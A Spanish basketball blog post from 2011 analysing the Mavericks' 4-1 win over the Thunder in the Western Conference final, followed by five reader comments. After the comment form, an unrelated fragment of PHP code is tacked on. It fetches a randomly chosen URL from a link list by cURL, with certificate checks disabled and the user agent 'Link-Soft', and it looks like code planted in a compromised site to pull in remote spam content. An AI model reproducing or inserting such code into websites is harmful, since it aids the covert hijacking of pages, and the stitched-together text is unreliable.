Final Oeste: Mavericks 4 – Thunder 1

26 de May de 2011 por TheDeerHunter

No va más. Ya tocamos con los dedos el final. Todo lo bueno se acaba.

La atractiva final de conferencia de este año en el Oeste ha terminado antes de lo que la mayoría de la gente esperaba. Otra muesca más en el revólver de los Mavericks. Idéntica solvencia en todas las rondas, con víctimas ilustres como Blazers o Lakers, pero insuficiente como para afirmar abiertamente que son tan favoritos como cualquiera. Sensación rara de “cuando veamos creeremos” consecuencia de otras situaciones acontecidas.

El 4 a 1 parece indicar una comodidad que no ha existido. Ha sido casi más producto de la casualidad que otra cosa. Los Thunder han sido rivales muy dignos, que tenían algunas victorias en sus manos pero que ciertos detalles azarosos les han privado de ellas. Los Mavs han tenido un punto extra de sosiego, de experiencia y, porqué no, también de fortuna que ha desequilibrado la balanza. Un punto con el que no contaron en sus más sonados fracasos en el pasado y con el que deberán contar Oklahoma en el futuro para subir ese peldaño definitivo.

Al principio de la eliminatoria avanzamos alguna de las claves. El Nowitzi vs Durant se ha resuelto ampliamente a favor del alemán con una exhibición ofensiva exagerada. Con tal abanico de filigranas aún en nuestra retina es imposible discutir que es el mejor europeo de la historia, como también se nos antoja aún más injusto la ausencia de algún anillo de campeón en sus dedos.

La serie se ha caracterizado además por una superioridad del colectivo Maverick sobre las grandes individualidades de Oklahoma, a pesar de que la única victoria lograda por los Thunder fuera del todo coral. En la hora de la verdad se ha visto que los Thunder están aún algo verdes y en términos de control de la presión y motivación los Mavericks también han rendido mejor. Los sistemas defensivos de Scott Brooks se han mostrado absolutamente ineficaces ante la elaboración ofensiva de sus rivales y como consecuencia de ello los Thunder no han podido correr, mostrando sus carencias en estático.

PREMIOS

MVP: Algunos le han comparado durante esta serie con el mejor Larry Bird. Más de 32 puntos por partido con porcentajes escandalosos. El catálogo de movimientos y de gestos mostrados debe de ser objeto de estudio y referencia para cualquiera relacionado amateur o profesionalmente con el mundo del baloncesto. Dirk Nowitzki también ha contado con el punto extra al que hacíamos referencia antes.

Sorpresa: Hubo una época en la que no sólo tenía estatus all-star, sino que también era considerado como el alero más completo de la liga. Tras mucho tiempo perdido, hemos vuelto a disfrutar con Shawn “The Matrix” Marion al menos durante esta serie.

Decepción: El 36% en tiro y las 5 pérdidas por partido dejan un sabor muy amargo en la concepción que todos teníamos de Russell Westbrook. Su desempeño pone en duda su capacidad para dirigir un equipo campeón. Sus defectos han quedado demasiado en evidencia.

Esfuerzo en vano: Kevin Durant también ha mostrado alguna sombra acosado por la defensa de Marion en esta serie pero nadie podrá decir que no se ha dejado la vida por ganar en los 45 minutos por partido que ha permanecido en cancha. 28 puntos, casi 9 rebotes y medio, 4 asistencias, casi un tapón y medio más un robo son números al alcance de muy pocos.

Comenta

5 comentarios a esta entrada

  1. Vader dice:
    #1

    Para mi una de las grandes claves a sido Tyson Chandler. Si este hubiera llegado a Dallas hace unos años quizás ya tendrian algún anillo. Les imprimi un carácter en defensa y rebote que es lo que le faltaba a Dallas todos estos años. Ha sido muy superior a Perkins. Antes de esta serie veia con muy buenos ojos el trade Perkins-Green, pero ahora ya no lo tengo tan claro viendo el rendimiento del pivot y pensando en las alternativas ofensivas que les hubiera podido dar el bueno de Jeff a los Thunder.

    Ahora toca esperar a que Miami gane el partido que le falta y disfrutar de este pedazo de final, lastima que Butler se lesionará, precisamente contra los Heat y contra LeBron es donde más le echarán de menos por muy bien que este jugando Marion.

    Saludos

      Citar

  2. Txusma dice:
    #2

    Apuntamos a Westbrook con el dedo y desconfiamos de él? No le veo como base de un equipo ganador. Acapara mucho balón y tampoco es que tire como los ángeles aunque evidentemente tiene muchas virtudes. Creéis que la relación en el equipo es igual que antes de empezar la serie? Ayer Westbrook se tiró hasta las zapatillas…

      Citar

  3. German dice:
    #3

    Coincido con el analisis, han sido todos partidos muy cerrados y yo creo que los Thunder se cavaron su fosa mas de una vez. La derrota del cuarto partido es inaceptable.
    El futuro es muy alentador para ellos, pero necesitan un cambio brusco de Westbrook. No puede tirar tantos tiros por partido y tener ese promedio escandaloso de perdidas, es urgente que empiece a pasar mas el balon. Harden ha tenido una gran serie, Ibaka es un muy buen defensor y la gran sorpresa para mi ha sido Nick Collison defendiendo mas que bien a Nowitzki aunque este haya promediado 32 puntos, creo que sin Collison podrian haber sido mas. Del que esperaba mucho mas es de Perkins. De Durant no hace falta decir nada, ya sabemos lo que es.
    De todas maneras creo que manteniendo esta base que ahora acumula otro año mas de experiencia con una final de conferencia incluida y teniendo un Westbrook mucho mas centrado, Oklahoma puede aspirar a grandes cosas la proxima temporada.

      Citar

  4. GreenPride dice:
    #4

    Pues sin duda ha sido una serie definida por la serenidad de los Mavs y la inexperiencia y ansiedad de los Thunder en los momentos decisivos.
    Es cierto que la actuación de Westbrook ha lastrado a su equipo, demasiados tiros, demasiadas pérdidas, el juego ha estado mucho mejor cuando Harden o incluso Maynor han movido al equipo. Es muy joven y sin duda mejorará mucho tanto en el control de sus acciones como en su lanzamiento exterior y para mí es uno de los bases del futuro seguro. Durant sigue mejorando y ha sido el que ha llevado a su equipo pero a veces ha abusado también del juego 1×1 ante un gran Marion que le ha incomodado bastante. El gran patinazo probablemente lo ha dado Perkins. Vino para ser elemento decisivo en playoffs seguramente pensando en Bynum&Gasol y al tener unas series donde no tenía un pivot dominante en ataque al que defender se le han visto todas sus carencias. Dallas las ha aprovechado para flotarle descaradamente y enviar a su defensor a las ayudas y eso ha hecho que terminase casi todos los partidos sentado en el banco por un gran Collison que ha luchado lo indecible y ha estado mucho mejor que él. Perkins para mí un jugador claramente sobrevalorado y sigo pensando que Ainge acertó para los Celtics con su trade.
    De Dallas increible, impresionante, celestial Nowitzki. Ha dominado a todos sus pares y ha creado psicosis en los Thunder, abriendo también huecos para que aprovecharan los demás sobre todo un Marion que ha recordado al de sus mejores años en Phoenix y a Terry y Stojakovic para lanzar. Gran serie de Barea anotando y haciendo jugar a la segunda unidad y dureza defensiva de los Mavs. Veremos si pueden ahora con los Heat en la reedición de las finales de 2006

      Citar

  5. Sempren dice:
    #5

    Creo que si los Thunder hubiesen movido bien el balón, Perkins también tendría sus puntitos, cosa que pasaba en Boston y no en esta serie.

    Por otra parte, me gustó la sugerencia que leí (creo que aquí): Nash a los Thunder. Creo que sería grandioso, buena parte de lo que necesita este equipo, y equipo con aspiraciones y regulación de los minutos para el canadiense.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>